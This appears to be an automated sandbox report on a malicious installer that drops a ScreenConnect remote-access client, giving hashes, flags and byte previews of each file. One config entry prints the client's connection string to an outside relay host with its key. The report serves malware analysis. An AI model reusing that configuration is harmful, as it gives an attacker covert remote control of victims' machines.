MD5:	826314610D9E854477B08666330940B5
SHA1:	65B601D60042CF6F263CD38AC2F63CD06A9DE159
SHA-256:	E54963CB63C9E471E2D3D59E55E4C7AEEDCCAFDD616B99C4B3AF230608E4BCC9
SHA-512:	5C01D6DE25D60EB6B1EB72B7FA6401B71153C2A740C41AEEB2BD302CC4E80F5C1A388B647EE16DA196705AC8EDBC60ABDA49B9A531517BB85959CC018FB5D1FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................-.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	546304
Entropy (8bit):	6.03286879586464
Encrypted:	false
SSDEEP:	6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
MD5:	3B1BA4BEBEFDC8A95B0F2F0B4E50C527
SHA1:	15551D2E8BFB829F3A96D161B43DE820C0D417CE
SHA-256:	A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
SHA-512:	F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721344
Entropy (8bit):	6.638160977312247
Encrypted:	false
SSDEEP:	24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
MD5:	D196174CF03F86C8776E717F07D5D19F
SHA1:	BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
SHA-256:	A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
SHA-512:	CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..\|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...\|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	260168
Entropy (8bit):	6.416438906122177
Encrypted:	false
SSDEEP:	3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
MD5:	5ADCB5AE1A1690BE69FD22BDF3C2DB60
SHA1:	09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
SHA-256:	A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
SHA-512:	812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.316664164724877
Encrypted:	false
SSDEEP:	1536:9Ai+zmNzdj8bv8DtYQ4RE+TC34/ibdt7Xx56:9UzmNDYQbEQta
MD5:	C1F206B0C0058DC4CC7B9F3125F61E20
SHA1:	541A1564799DA24C48BE188888F306381EF23728
SHA-256:	94E711FD79FC81084FB222FF927893669DDBA9890C6622DD4981FB5766438A63
SHA-512:	6163A255DAF2DC9EC14391F31CA09A466B7B33662F2215B9941ADD59B46CD1177E9240D2B1C42E41EA0AC9AE2EFA03F6A2D3E80497D32F6E505B813ED66DA2AD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.8..........."...0................. ........@.. ....................... ............@.....................................O....... ............... )..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S...............................................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....(".....0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	598816
Entropy (8bit):	6.182826342545805
Encrypted:	false
SSDEEP:	6144:0ya9pDzjhf+YMojz3cZRzyyUs0Ny2rOfQyEAlVw72191BVi1NnfEQcYF2/R4IrNC:jajDzNZFjLcZRzyyh5/EA3wv1lSYGXk
MD5:	AB5FA8D90645878D587F386D0E276C02
SHA1:	A602A20735A1104851F293965F1FE4AB678BF627
SHA-256:	316BBF433F1F803D113ADF060C528CCC636656CEE26B90F5FEA011C1C73C7D16
SHA-512:	A181E23C8FA01BC1D9F0F9F95A5CA6112E2B61F34F4C1DA696D3CCABBBD942BCC81A3F4A60921328A6020D28AED8711C22BE33761CB685921D50FEA8B1D7B986
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]..........."...0.............".... ... ....@.. .......................`......0.....@.....................................O.... .................. )...@......$...8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......LC..X.............................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	true
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	842248
Entropy (8bit):	6.268561504485627
Encrypted:	false
SSDEEP:	12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
MD5:	BE74AB7A848A2450A06DE33D3026F59E
SHA1:	21568DCB44DF019F9FAF049D6676A829323C601E
SHA-256:	7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
SHA-512:	2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..\|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...\|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...\|..............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.861320173003981
Encrypted:	false
SSDEEP:	1536:QtyCl44uzbexI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7AB7gxv:78BxukLdEBY
MD5:	2C158A30F7274E1931860E434DE808A2
SHA1:	F649A56C9A598117D68CC6999627A937305DB6C7
SHA-256:	B623E67BEA356C1793F3C921C5838719ED8B879EFCD966E97EE753498B1618B5
SHA-512:	14BD481BF183CACAE210EB06AFF04870C6D53D3E7F095EA7F96A7EA227167E6A38EB20C9EDE9F36BF23D02C36182A463239B3A835D0BD28E8666C378F76FE64D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..@...........^... ...`....@.. .......................`...... .....@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	4.7228220006400745
Encrypted:	false
SSDEEP:	48:35iMs86h/dHH/dHS/dHmh/dHfh/dH8h/dHjdH6dH85AfdH55AfdHKdH/dHAdHYOk:0OeHVHeHyHzHAHZHUH82H52HkH1HyHDC
MD5:	095C85ACC658F0733BC6941163EC234C
SHA1:	298C53608E02CAC620702CB6ABE75C70560C03B1
SHA-256:	8E3DC9D06B282A536E1AF7806D7F434D5738D4932DAE557CCD762BFEED0BFC11
SHA-512:	FE3FBE2BCD2BAABCF192663DD7603CCE1DB1025A9D40AD98598D5441D892EFC0C94AA41FE61256762538E0ED3BCC3E7958CDBF87C2D577EE3BDD561597635D03
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings />.. <ScreenConnect.UserInterfaceSettings>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConne

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (447), with CRLF line terminators
Category:	dropped
Size (bytes):	937
Entropy (8bit):	5.785690574308825
Encrypted:	false
SSDEEP:	24:2dL9hK6E4dl/SKGumeV858KnTqKoIgmCeKMG3vH:chh7HHSomeV8LnuKoHmCeKT3v
MD5:	5E233AF4F36C85FA9CA6A643F8CEA130
SHA1:	9F64A3CFB01BBFE02C4511F0AF9856FA2DA89452
SHA-256:	317F6ACC9CF9A2DAD21874D0F439C6B6DE3C14BA875FAA525B24CA5DBC74C91D
SHA-512:	4CD32CD0243BEA0CA3C45544D65F4DBA0DBEDB79E09C4A8211AF0568E2F6C7EFE77B5D2C7EA21C7EB94FF1863D426EBA850055819F294DF1C1D0C4D311C036D7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=lokistorage.xyz&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lat0Kwfbuj.exe.log

Process:	C:\Users\user\Desktop\lat0Kwfbuj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.36509199858051
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
MD5:	1CF2352B684EF57925D98E766BA897F2
SHA1:	6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
SHA-256:	43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
SHA-512:	9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	746
Entropy (8bit):	5.349174276064173
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
MD5:	ED994980CB1AABB953B2C8ECDC745E1F
SHA1:	9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
SHA-256:	D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
SHA-512:	61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Temp\MSI805D.tmp

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Category:	dropped
Size (bytes):	1110630
Entropy (8bit):	7.800118817272725
Encrypted:	false
SSDEEP:	24576:QUUGGVA5kuQ7Ye80NncfI59+5lwXoTl2cx:jGVyk7cer5IIvXobx
MD5:	845B0569D54305E62C6E8FFE198D217C
SHA1:	CD06C3D1554FE08099ADA4F4448A23A6422E6234
SHA-256:	4DA6C507C746CD07CA4546E723D0D145BBF4D26FF8DE13F1A0750EF323A89A2E
SHA-512:	AF45BB8199F2AF323B9954DA0D11EED51459708608D356BC40BD9D9189C02C2C902F533077724DD7C6A7068E564B5C8F621EF1032098CEF26ED26D5BF26E23FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..\|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\CustomAction.config

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	228
Entropy (8bit):	5.069688959232011
Encrypted:	false
SSDEEP:	6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
MD5:	EB99EE012EB63C162EEBC1DF3A15990B
SHA1:	D48FD3B3B942C754E3588D91920670C087FCE7E9
SHA-256:	C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
SHA-512:	455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.Cab.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.62694170304723
Encrypted:	false
SSDEEP:	768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
MD5:	77BE59B3DDEF06F08CAA53F0911608A5
SHA1:	A3B20667C714E88CC11E845975CD6A3D6410E700
SHA-256:	9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
SHA-512:	C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.340550904466943
Encrypted:	false
SSDEEP:	384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
MD5:	4717BCC62EB45D12FFBED3A35BA20E25
SHA1:	DA6324A2965C93B70FC9783A44F869A934A9CAF7
SHA-256:	E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
SHA-512:	BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	4.657268358041957
Encrypted:	false
SSDEEP:	768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
MD5:	A921A2B83B98F02D003D9139FA6BA3D8
SHA1:	33D67E11AD96F148FD1BFD4497B4A764D6365867
SHA-256:	548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
SHA-512:	E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	176128
Entropy (8bit):	5.775360792482692
Encrypted:	false
SSDEEP:	3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
MD5:	5EF88919012E4A3D8A1E2955DC8C8D81
